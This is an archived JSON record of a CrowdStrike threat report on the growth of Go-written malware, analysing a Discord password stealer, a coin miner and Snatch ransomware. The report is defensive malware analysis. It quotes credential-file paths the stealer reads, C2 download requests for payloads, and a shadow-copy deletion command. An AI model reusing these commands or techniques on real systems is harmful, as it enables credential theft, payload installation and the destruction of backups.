{
	"id": "2b51fa12-5e73-4cb4-b6fe-fa2d60c4b4b7",
	"created_at": "2026-04-06T01:32:00.012425Z",
	"updated_at": "2026-04-10T03:24:58.216524Z",
	"deleted_at": null,
	"sha1_hash": "c55cbffd1f77c096e11f76e70597d331c07219c5",
	"title": "Financial Motivation Drives Golang Malware Adoption | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 958636,
	"plain_text": "Financial Motivation Drives Golang Malware Adoption |\r\nCrowdStrike\r\nBy Anmol Maurya\r\nArchived: 2026-04-06 00:43:09 UTC\r\nGolang malware popularity snowballs, increasing by 80% from June to August 2021\r\neCrime turns to Golang because of its versatility, enabling cross-compiling for other operating systems\r\nCryptocurrency miners earn the largest share of total Golang malware — 70% in August compared to 54%\r\nin June 2021\r\nCrowdStrike researchers uncovered an 80% increase in Golang (Go)-written malware samples from June to\r\nAugust 2021, according to CrowdStrike threat telemetry. In terms of malware type, first place goes to coin miners,\r\naccounting for 70% of the malware spectrum in August 2021. Golang’s versatility in enabling the same codebase\r\nto be compiled for all major operating systems, coupled with the financial incentive offered by coin miners, could\r\nbe one of the driving factors behind the recent wave of Go-written malware. However, we will likely see more\r\nGo-based malware as it is becoming more popular with developers. Golang’s versatility has turned it into a one-stop shop for financially motivated eCrime developers. Instead of rewriting malware for Windows, macOS and\r\nLinux, eCriminals can use Golang to cross-compile the same codebase with ease, allowing them to target multiple\r\nplatforms effortlessly. Other applications for Golang involve using it as a wrapper for various eCrime malware,\r\nsuch as ransomware. Some ransomware variants turned to Golang wrappers to make analysis more difficult for\r\nsecurity research. Besides coin miners, password-stealing trojans and downloaders developed in Golang are also\r\npopular. These can potentially be handy to the eCrime community, especially access brokers, as they can serve as\r\ninitial access and information harvesting tools into targeted systems and infrastructure. Whether Go-written\r\nmalware is used to generate profit from victims by exploiting their computing power, or used as a tool to collect\r\nand potentially sell sensitive data and access into compromised infrastructures, financial motivation fuels eCrime\r\nadoption of Go-powered threats.\r\nFigure 1. Daily Golang-written malware evolution (June-August 2021) (Click to enlarge)\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 1 of 10\n\neCrime dominates the threat landscape, making up 79% of interactive intrusion activity, according to the recent\r\nCrowdStrike 2021 Threat Hunting Report. However, most Go-written malware seems focused on generating\r\nrevenue by exploiting the computing power of their victims and mining for cryptocurrency. Coin miners\r\naccounted for 54% of all Go-written malware in June 2021, 62% in July and 70% in August, according to\r\nCrowdStrike threat telemetry.\r\n Figure 2. Golang-written malware distribution in\r\nJune, July and August 2021\r\nWhile 91% of identified Golang malware samples are compiled to target the Windows operating systems, 8% are\r\ncompiled for macOS and 1% for Linux. Golang allows developers to use the same codebase and compile their\r\ncode for Windows, Linux and macOS, but eCrime developers are likely targeting Windows more because of\r\npotential market share. Some of the more exotic malware families that we’ve identified as using Go revolve\r\naround ransomware such as GoGoogle ransomware, Ekans ransomware, eCh0raix ransomware and Snatch\r\nransomware, as well as remote access trojans (RATs), such as CYBORG SPIDER’s Pysa Golang RAT.\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 2 of 10\n\nFigure 3. File type distribution of Golang malware (June-August 2021)\r\nUnusually, we did find instances where it’s not immediately apparent which cryptocurrency some coin miners are\r\nattempting to mine. While most coin miners are usually XMRig wrappers, developers likely wanted to give\r\nthemselves the option of mining for any cryptocurrency that’s appealing at the time of infection.\r\nWhy Stay When You Can GO?\r\nOne reason malware developers may not stay faithful to traditional programming languages — such as C++ or\r\nPython — and choose to go with Go could be because Go performs 40 times faster than optimized Python code,\r\naccording to benchmarking tests. Also, a single codebase can be compiled into all major operating systems.\r\nConsequently, when analyzing Go-written malware, we generally need to focus on “main” functions. However,\r\nbecause of the large size of the samples, there’s also the added burden of going through many functions, unlike\r\nC/C++ where we usually find fewer. When Go compiles an executable, it also includes Go standard symbols in\r\nthe binary, which can substantially increase the size of an executable. Golang binaries include a .gopclntab\r\nstructure, which maps the symbol name and its corresponding offset. The structure also contains symbol names of\r\nfunctions created by the developer, prefixed with the string \"main,\" which is why we generally focus on \"main\"\r\nfunctions. Adding obfuscation on top of all of this, using open-source tools such as “gobfuscate” — which allow\r\nmalware developers to compile Go binaries from obfuscated source code — can significantly hamper reverse\r\nengineering efforts in terms of deciphering the malicious binary. Looking at threat telemetry from June to August\r\n2021, three different Go-written malware samples were analyzed as case studies to identify some of the Golang-based malware's capabilities. Next is a summary analysis of three different types of malware built using Golang.\r\nGO-written AnarchyGrabber Password Stealer\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 3 of 10\n\nA new Go-written AnarchyGrabber password stealer variant was spotted on Sept. 1, 2021, packing many of the\r\nsame features of its C++ counterpart. The analyzed sample (SHA256 hash\r\n86dda1e904475fdf187af0cb13c0b67951e95230ed2bc6a3ac79c292606fda8e ) behaves in much the same way,\r\nstealing the victim’s Discord user token and using the platform to spread additional malware using the victim’s\r\nfriends list. AnarchyGrabber can steal passwords and usernames from Google Chrome/Brave and tokenlog the\r\nuser’s Discord account, as shown in Table 1 below. It will then use a webhook to broadcast the victim’s passwords\r\nand user profiles from browsers, email address, login name, user token, passwords and IP address to a Discord\r\nchannel operated by the threat actor. Using Discord as a C2 server for both exfiltrating data and accepting\r\ncommands is not uncommon, and the Go-written variant of AnarchyGrabber perfectly emulates the C++ behavior\r\nof its C++ version.\r\nmain.grab_discord \\AppData\\Roaming\\Discord\\Local Storage\\\r\nmain.grab_discord_canary \\\\Discordcanary\\\\Local Storage\\\\\r\nmain.grab_discord_ptb \\\\discordptb\\\\Local Storage\\\\\r\nmain.grab_google_chrome \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login\r\nmain.grab_opera \\Opera Software\\Opera Stable\\Local Storage\\\r\nmain.grab_brave \\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\\r\nmain.grab_yandex \\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\\r\nTable 1. AnarchyGrabber main functions\r\nThe developers behind this implementation of AnarchyGrabber seem to use some open-source tools for interacting\r\nwith Discord webhooks or parsing snowflakes, which are uniquely identifiable descriptors for resources that\r\ncontain a timestamp, such as accounts, messages, channels and servers. The CrowdStrike Falcon® platform\r\ndetects and protects against this type of Go-written malware using the power of the cloud, on-sensor and in-the-cloud machine learning, and indicators of attack (IOAs) to detect the threat. As the screenshot below illustrates,\r\nwe detect this sample with our cloud-based machine learning, and it is immediately blocked.\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 4 of 10\n\nFigure 4. CrowdStrike Falcon® detection and protection for AnarchyGrabber (Click to enlarge)\r\nGO(ing) for Crypto Mining\r\nThe spike in Go-written cryptominers is fueled in part by its adaptability. Malware authors either create custom\r\nminers or build wrappers for existing miners like XMRig. While creating wrappers is not new, it presents malware\r\ndevelopers with the added benefit of allowing them to switch mining between various cryptocurrencies.\r\nDepending on which cryptocurrency is more popular or the victim's computing power, threat actors can change\r\nwhich cryptocurrency they want to mine. An example of a recent sample written in Go (SHA256 hash\r\n995d7903e138b3f5aa318d44e959d215c6b28ea491f519af34c8bdad9a0ebda6 ) is also a XMRig wrapper compiled for\r\nWindows and uses a couple of interesting techniques that are unusual from other coin miners. Among its more\r\nnovel features is killing processes that consume too much CPU. Its developers likely want to boost the\r\ncryptomining process by killing processes that are not critical, fully utilizing the victim’s computing power for\r\nfinancial gains. Additional features include checking if the malware is already present on the victim’s machine, if\r\nthere’s an instance of the process already running, and downloading other files from an attacker-controlled C2\r\nserver.\r\nmain.FileExists Checking the existence of file using OS.Stat\r\nmain.writetofile Writing to file using ioutil.WriteFile\r\nmain.isrunning\r\nChecking the status of Process using:\r\n1)github_com_mitchellh_go_ps_procCreateToolhelp32Snapshot\r\n2)github_com_mitchellh_go_ps_procProcess32First\r\nmain.killprocess For killing the process the attacker is using taskkill\r\nmain.DownloadFile GETs Files from webserver\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 5 of 10\n\n“GET /d/windowsupdatev1.json HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/inj.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/runtime.dll HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/autoupdate.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/updater.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/procdump.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/service.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\nmain.getcpuusage\r\nUsing PS command to sort output based on RAM usage: “ps -eo\r\npid,ppid,cmd,%mem,%cpu --sort=-%mem | head -n 2 | tail -n “ It will use to kill\r\nprocesses that are utilizing RAM too much\r\nTable 2. Coin miner main functions\r\nUpon execution, this Go-written coin miner downloads the Runtime.dll file containing the debug path\r\n(“ C:\\Users\\admin\\Desktop\\toolchain\\deamon\\hide_proc_research\\Hide-Me-From-Task-Manager-master\\HookerDLLBuild\\bin\\x64\\Release\\HookerDLL.pdb ”). It also downloads an open-source command-line\r\nutility (Inj.exe) that actors potentially use to inject and eject DLLs, including Runtime.dll. It also uses\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 6 of 10\n\nProcdump.exe (a command was run that is associated with dumping LSASS process memory). Among other\r\nfeatures, its developers also included checking the version of the downloaded files to potentially update them\r\nshould new releases be available and running daily scheduled tasks with the sample to ensure persistence on the\r\ncompromised machine. The Falcon platform also detects this particular Go-written coin miner using machine\r\nlearning and IOAs. As shown in Figure 5, our machine learning can block at the initial stage of an attack and uses\r\nIOAs triggered by various tactics and techniques.\r\nFigure 5. CrowdStrike Falcon® uses machine learning and IOAs of the tactics and techniques of the Golang-written coin miner (Click to enlarge)\r\nGO Snatch, Go!\r\nSnatch ransomware has been around since 2018, especially featuring multiple 32-bit or 64-bit implementations\r\nwritten in Golang. This is a perfect example of Golang being more than just a fad, but an actual “go-to”\r\nprogramming language that malware developers actively use. In fact, our own telemetry from June to August 2021\r\nshows that Go-written malware accounted for 7% of all samples. After making its debut around late 2018, Snatch\r\nransomware has been on and off the radar of security companies and researchers ever since. It has constantly been\r\nupdated and improved with new anti-forensic features and various capabilities, as with any ransomware family.\r\nAnalyzing one of the more recent Snatch ransomware samples that’s compiled explicitly for Windows\r\n( e4b2d60cea9c09a7871d0f94fe9ca38010ef8e552f67e7cdec7489d2a1818354 ), not much has changed in terms of\r\nhow previous researchers described the inner workings of ransomware. It uses the “ujvxadjxkoz” file extension\r\nfor encrypted files. It places a \"HOW TO RESTORE YOUR FILES.TXT\" file in all the compromised folders. It\r\ncontinues to rely on the Golang openpgp package for operations on OpenPGP messages. However, among some of\r\nthe changes implemented by this particular Snatch ransomware sample involve making changes to the exclusion\r\nlist for encrypting various directories: Program Files, ProgramData, Default User, recovery, $recycle.bin,\r\nperflogs, common files, dvd maker, msbuild, microsoft games, mozilla firefox, tap-windows, windows\r\ndefender, windows journal, windows mail, windows nt, windows sidebar, microsoft.net, microsoft, start\r\nmenu, templates, favorites As seen in Figure 6, Snatch ransomware starts by initializing the main structures\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 7 of 10\n\nnecessary for Golang malware execution and then uses the main_decodeString function to pass encrypted data\r\nfirst encoded with Base64, then uses XOR encryption using the key “mjkHreiUxqcTSyhWnbDXYuE.”\r\nFigure 6. Snatch ransomware main_init functions\r\nThe main_makeBatFile creates a .bat file using main_randomBatFileName containing the queries “ SC QUERY\r\n| FINDSTR SERVICE_NAME ” and “ vssadmin delete shadows /all /quiet ”. In this case, it creates a file with the\r\nnceirbfjdgljlw.bat filename. In terms of persistence, Snatch ransomware uses the main_runService function\r\nto run Service using the SVC Golang package. Finally, the main_encrypt function is responsible for triggering\r\nthe encryption process, at the end of which it places a ransom note in every encrypted folder on the victim’s\r\nsystem. The ransom note provides two email addresses for contacting the ransomware operator to negotiate the\r\nransom demand and potentially recover the encryption key.\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 8 of 10\n\nFigure 7. Ransom note for Snatch ransomware (Click to enlarge)\r\nThe Falcon platform detects and protects against this type of Golang-written malware using the power of the\r\ncloud, on-sensor and in-the-cloud machine learning, and IOAs to detect the threat. As the screenshot below\r\nillustrates, we detect this sample with our cloud-based machine learning, and it is immediately blocked.\r\nFigure 8. CrowdStrike Falcon® using machine learning for detecting and preventing Snatch ransomware (Click to\r\nenlarge)\r\nNote: More detailed intelligence and technical information about Snatch ransomware is available to CrowdStrike\r\ncustomers through the Falcon console.\r\nGolang Is Here to Stay\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 9 of 10\n\nGolang-written malware is not a fad and will not go away at any time soon. If anything, we are seeing an increase\r\nin Golang being used by malware developers and adversaries. This is likely in step with how we see Go being\r\nadopted by the general programming community as features and capabilities have improved. Golang has proven to\r\nbe a sufficiently versatile programming language that can accommodate any malware, although coin miners\r\ncurrently seem to pique the interest of developers. CrowdStrike will continue to monitor the evolution of the\r\nmalware threat landscape and use the power of machine learning and IOAs to detect and protect endpoints from\r\nnew and unknown malware.\r\nIndicators of Compromise (IOCs)\r\nFile SHA256\r\nAnarchyGrabber 86dda1e904475fdf187af0cb13c0b67951e95230ed2bc6a3ac79c292606fda8e\r\nCoin Miner 995d7903e138b3f5aa318d44e959d215c6b28ea491f519af34c8bdad9a0ebda6\r\nSnatch Ransomware e4b2d60cea9c09a7871d0f94fe9ca38010ef8e552f67e7cdec7489d2a1818354\r\nRuntime.dll 5b3fc771f43d8e67bd8957f7b3d9a49eae80b88e43c13cbf16623623e9028375\r\nInj.exe cc432ca276209849b1e4e36553d12aa87fd4cf1ba2609032986bf82943994774\r\nProcdump.exe c073d88d4240fbd6b7183b126eb0f3617bad8944d7cf924982e2b814170a614f\r\nAdditional Resources\r\nVisit the product website to learn how the powerful CrowdStrike Falcon® platform provides comprehensive\r\nprotection across your organization, workers and data, wherever they are located.\r\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™ and see how true next-gen AV performs\r\nagainst today’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/"
	],
	"report_names": [
		"financial-motivation-drives-golang-malware-adoption"
	],
	"threat_actors": [
		{
			"id": "5bc2bb61-9b32-496f-b54b-61cf3d01969f",
			"created_at": "2023-01-06T13:46:39.246266Z",
			"updated_at": "2026-04-10T02:00:03.259193Z",
			"deleted_at": null,
			"main_name": "GOLD BURLAP",
			"aliases": [
				"CYBORG SPIDER"
			],
			"source_name": "MISPGALAXY:GOLD BURLAP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439120,
	"ts_updated_at": 1775791498,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c55cbffd1f77c096e11f76e70597d331c07219c5.pdf",
		"text": "https://archive.orkl.eu/c55cbffd1f77c096e11f76e70597d331c07219c5.txt",
		"img": "https://archive.orkl.eu/c55cbffd1f77c096e11f76e70597d331c07219c5.jpg"
	}
}